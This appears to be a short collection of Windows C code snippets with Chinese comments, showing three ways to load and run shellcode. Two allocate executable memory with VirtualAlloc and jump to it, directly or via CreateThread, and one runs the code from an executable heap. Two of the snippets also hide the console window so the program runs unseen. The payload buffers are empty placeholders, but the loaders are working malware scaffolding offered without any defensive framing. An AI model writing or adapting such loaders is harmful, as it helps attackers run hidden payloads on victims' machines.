VirtualAlloc申请内存

#include <windows.h>
#include <iostream>
#include <time.h>
#pragma comment (lib, "winmm.lib")

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
void startShellCode()
{
 unsigned char buf[] = "";

 void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 memcpy(exec, buf, sizeof(buf));
 ((void(*)())exec)();
}

void main() {
 startShellCode();
}

#include<windows.h>

int main()
{
	int shellcode_size = 0;
	DWORD dwThreadId;
	HANDLE hThread;
	DWORD dw01dRrotect;

	unsigned char buf[] = "";
	shellcode_size = sizeof(buf);

	LPVOID shellcode = VirtualAlloc(
		NULL,
		shellcode_size,
		MEM_COMMIT,
		PAGE_EXECUTE_READWRITE
	);

	//将shellcode复制到可读可写的内存中
	CopyMemory(shellcode, buf, shellcode_size);

	hThread = CreateThread(
		NULL,	//安全描述符
		NULL,	//栈的大小
		(LPTHREAD_START_ROUTINE)shellcode,//函数
		NULL,	//参数
		NULL,	//线程标志
		&dwThreadId
	);

	WaitForSingleObject(hThread, INFINITE);	//一直等待线程结束
}

堆

#include<Windows.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//隐藏dos黑窗口

int main(void) {
	unsigned char buf[] = "shellcode";

	//创建一个堆
	HANDLE myHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	//从堆上分配一块内存
	void* exec = HeapAlloc(myHeap, HEAP_ZERO_MEMORY, sizeof(buf));
	memcpy(exec, buf, sizeof(buf));

	((void(*)())exec)();
	return 0;
}